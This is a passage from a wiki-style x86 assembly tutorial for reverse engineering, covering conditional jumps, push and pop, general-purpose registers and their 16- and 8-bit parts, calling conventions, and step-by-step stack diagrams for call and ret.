''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' between the two operands instead of a subtraction, again throwing away the result. ''test'' is most commonly used with the same register as both operands (for example, ''test eax, eax'') to check whether it is zero.<br />
<br />
=== jz/je, jnz/jne, jl, jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
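* ''jl'' jumps if the first parameter is less than the second in a signed comparison. ''jb'' ("jump if below") is its unsigned counterpart; the two are not synonyms, because they check different flags. <br />
* ''jg'' jumps if the first parameter is greater than the second (signed). <br />
* ''jle'' jumps if the first parameter is "less than or equal to" the second (signed); that is, if the 'zero' flag is set or the 'sign' and 'overflow' flags differ. <br />
* ''jge'' jumps if the first is "greater than or equal to" the second (signed).<br />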
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Instructions in this section are used for adding data to and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used instructions. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
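<br />
The two equivalences above can be modeled in C. This is a toy sketch, not how a real CPU is implemented: the <code>Machine</code> type, the 64-byte memory size and the function names are all made up for illustration, and esp is stored as a byte offset into a small array.<br />

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define STACK_BYTES 64

typedef struct {
    uint8_t  mem[STACK_BYTES]; /* pretend stack memory */
    uint32_t esp;              /* byte offset into mem */
} Machine;

void machine_init(Machine *m) {
    memset(m->mem, 0, sizeof m->mem);
    m->esp = STACK_BYTES;      /* an empty stack starts at the highest address */
}

void push32(Machine *m, uint32_t value) {
    assert(m->esp >= 4);
    m->esp -= 4;                            /* sub esp, 4 */
    memcpy(&m->mem[m->esp], &value, 4);     /* mov [esp], value */
}

uint32_t pop32(Machine *m) {
    uint32_t value;
    assert(m->esp + 4 <= STACK_BYTES);
    memcpy(&value, &m->mem[m->esp], 4);     /* mov value, [esp] */
    m->esp += 4;                            /* add esp, 4 */
    return value;
}
```

Pushing 1 and then 2 moves esp from 64 down to 56; popping twice returns 2 and then 1 and brings esp back to 64.<br />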
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
<br />
=== pushaw, pushad, popaw, popad ===<br />
''pushaw'' and ''pushad'' save all 16-bit or 32-bit general-purpose registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all 16-bit or 32-bit general-purpose registers from the stack. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Won't this just loop forever because ecx is never incremented? Total noob here, so I may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, the stack pointer is decremented on a push, but incremented on a pop? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3138Registers2012-01-16T00:44:54Z<p>Killboy: /* flags */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. Most math (addition, subtraction, etc.) is done in registers. Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a convention of the compiler and must be looked after in the code; registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is that when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to the object (the ''this'' pointer) is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, keep the counter variable in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it until it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack, which is the lowest address in use because the stack grows towards lower addresses. Apart from adding or subtracting a constant to reserve or release stack space, math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning, and the bits store meta-information about the results of previous operations: for example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations, which commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is the lower half of one of the 32-bit registers, so that changing the 16-bit register also changes the 32-bit one. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships between these registers are shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
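<br />
The two tables above can be reproduced with masks and shifts in C. This is a minimal sketch; the helper names <code>reg_ax</code>, <code>reg_ah</code>, <code>reg_al</code> and <code>set_al</code> are made up for illustration, and eax is just an ordinary 32-bit integer here.<br />

```c
#include <stdint.h>

/* ax is the low 16 bits of eax. */
uint16_t reg_ax(uint32_t eax) { return (uint16_t)(eax & 0xFFFFu); }

/* ah is the high byte of ax (bits 8..15 of eax). */
uint8_t reg_ah(uint32_t eax) { return (uint8_t)((eax >> 8) & 0xFFu); }

/* al is the low byte of ax (bits 0..7 of eax). */
uint8_t reg_al(uint32_t eax) { return (uint8_t)(eax & 0xFFu); }

/* Writing al replaces only the low byte; the rest of eax is untouched. */
uint32_t set_al(uint32_t eax, uint8_t al) {
    return (eax & 0xFFFFFF00u) | al;
}
```

For eax = 0x12345678 these helpers give ax = 0x5678, ah = 0x56 and al = 0x78, matching the first table, and setting al to 0xFF turns eax into 0x123456FF.<br />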
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
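<br />
In C terms, edx:eax behaves like a 64-bit integer whose upper half lives in edx and whose lower half lives in eax. The sketch below uses made-up helper names (<code>combine_edx_eax</code>, <code>mul32</code>) to show the concatenation from the table above, and how a 32-bit by 32-bit unsigned multiplication produces a result that is split across the pair.<br />

```c
#include <stdint.h>

/* Concatenate edx (upper 32 bits) and eax (lower 32 bits). */
uint64_t combine_edx_eax(uint32_t edx, uint32_t eax) {
    return ((uint64_t)edx << 32) | eax;
}

/* Unsigned 32x32 multiplication with the 64-bit product split into edx:eax. */
void mul32(uint32_t a, uint32_t b, uint32_t *edx, uint32_t *eax) {
    uint64_t product = (uint64_t)a * b;
    *edx = (uint32_t)(product >> 32);
    *eax = (uint32_t)product;
}
```

Multiplying 0xFFFFFFFF by 2 gives 0x1FFFFFFFE, which does not fit in 32 bits, so edx ends up holding 1 and eax holds 0xFFFFFFFE.<br />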
<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=The_Stack&diff=3137The Stack2012-01-16T00:41:18Z<p>Killboy: /* Frame Pointer */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The stack is, at best, a difficult concept to understand. However, understanding the stack is essential to reverse engineering code. <br />
<br />
The stack register, esp, is basically a register that points to an arbitrary location in memory called "the stack". The stack is just a really big section of memory where temporary data can be stored and retrieved. When a function is called, some stack space is allocated to the function, and when a function returns the stack should be in the same state it started in. <br />
<br />
The stack always grows downwards, towards lower addresses. The esp register always points to the lowest address in use on the stack. Anything below esp is considered free memory that can be overwritten. <br />
<br />
The stack stores function parameters, local variables, and the return address of every function. <br />
<br />
== Function Parameters ==<br />
When a function is called, its parameters are typically stored on the stack before making the call. Here is an example of a function call in C:<br />
func(1, 2, 3); <br />
And here is the equivalent call in assembly:<br />
push 3<br />
push 2<br />
push 1<br />
call func<br />
add esp, 0Ch<br />
<br />
The parameters are put on the stack, then the function is called. The function has to know it's getting 3 parameters, which is why function parameters have to be declared in C. <br />
<br />
After the function returns, the stack pointer is still 12 bytes below where it started. In order to restore the stack to where it used to be, 12 (0x0c) has to be added to the stack pointer. The three pushes, of 4 bytes each, mean that a total of 12 was subtracted from the stack pointer. <br />
<br />
Here is what the initial stack looked like (with ?'s representing unknown stack values):<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
Note that the same five 32-bit stack slots are shown in all these examples; only the esp-relative labels in the left column move. The stack extends much further up and down, but that isn't shown here. <br />
<br />
Here are the three pushes:<br />
<br />
<br />
<br />
push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Now all three values are on the stack, and esp is pointing at the 1. The function is called, and returns, leaving the stack the way it started. Now the final instruction runs:<br />
<br />
<br />
<br />
add esp, 0Ch<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note that the 3, 2, and 1 are still on the stack. However, they're below the stack pointer, which means that they are considered free memory and will be overwritten.<br />
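<br />
The point about stale values can be demonstrated with a toy model. This is only a sketch under simplifying assumptions: the <code>ToyStack</code> type, its eight 4-byte slots and the function names are made up for illustration, and esp is stored as a slot index rather than a real address.<br />

```c
#include <assert.h>
#include <stdint.h>

#define SLOTS 8

typedef struct {
    uint32_t slot[SLOTS]; /* each slot stands for 4 bytes of stack */
    int      esp;         /* index of the lowest slot in use */
} ToyStack;

void toy_init(ToyStack *s) {
    for (int i = 0; i < SLOTS; i++) s->slot[i] = 0;
    s->esp = SLOTS;       /* empty: esp sits just past the highest slot */
}

void toy_push(ToyStack *s, uint32_t value) {
    assert(s->esp > 0);
    s->slot[--s->esp] = value;
}

/* add esp, bytes: release stack space without touching the memory itself. */
void toy_add_esp(ToyStack *s, int bytes) {
    assert(bytes % 4 == 0 && s->esp + bytes / 4 <= SLOTS);
    s->esp += bytes / 4;
}
```

After pushing 3, 2 and 1 and then releasing 12 bytes, the three values are still sitting in their slots; the next push simply writes over the slot that held the 3.<br />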
<br />
== call and ret Revisited ==<br />
<br />
The ''call'' instruction pushes the address of the next instruction onto the stack, then jumps to the specified function. <br />
<br />
The ''ret'' instruction pops the next value off the stack, which should have been put there by a call, and jumps to it. <br />
<br />
Here is some example code:<br />
0x10000000 push 3<br />
0x10000001 push 2<br />
0x10000002 push 1<br />
0x10000003 call 0x10000020<br />
0x10000007 add esp, 12<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
0x10000020 mov eax, 1<br />
0x10000024 ret<br />
<br />
Now here is what the stack looks like at each step in this code:<br />
<br />
<br />
<br />
0x10000000 push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000001 push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000002 push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000003 call 0x10000020<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000020 mov eax, 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000024 ret<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000007 add esp, 12<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note the return address being pushed onto the stack by call, and being popped off the stack by ret.<br />
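<br />
The behaviour of ''call'' and ''ret'' can be sketched in C as two small operations on an instruction pointer and a stack. The <code>Cpu</code> type and the function names below are made up for illustration, and the stack is again a small array indexed by slot rather than real memory.<br />

```c
#include <assert.h>
#include <stdint.h>

#define CPU_SLOTS 8

typedef struct {
    uint32_t stack[CPU_SLOTS]; /* toy stack, one slot per 4 bytes */
    int      sp;               /* index of the lowest slot in use */
    uint32_t eip;              /* address of the instruction to run next */
} Cpu;

/* call target: push the address of the next instruction, then jump. */
void cpu_call(Cpu *c, uint32_t next_instruction, uint32_t target) {
    assert(c->sp > 0);
    c->stack[--c->sp] = next_instruction;
    c->eip = target;
}

/* ret: pop the saved address off the stack and jump to it. */
void cpu_ret(Cpu *c) {
    assert(c->sp < CPU_SLOTS);
    c->eip = c->stack[c->sp++];
}
```

Using the addresses from the example, calling 0x10000020 from 0x10000003 leaves 0x10000007 on the stack, and the ''ret'' at the end of the function sends execution back to 0x10000007.<br />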
<br />
== Saved Registers ==<br />
Some registers (ebx, edi, esi, ebp) are generally considered to be non-volatile. What that means is that when a function is called, those registers have to be saved. Typically, this is done by pushing them onto the stack at the start of a function, and popping them in reverse order at the end. Here is a simple example:<br />
<br />
; function test()<br />
push esi<br />
push edi<br />
.....<br />
pop edi<br />
pop esi<br />
ret<br />
<br />
== Local Variables ==<br />
<br />
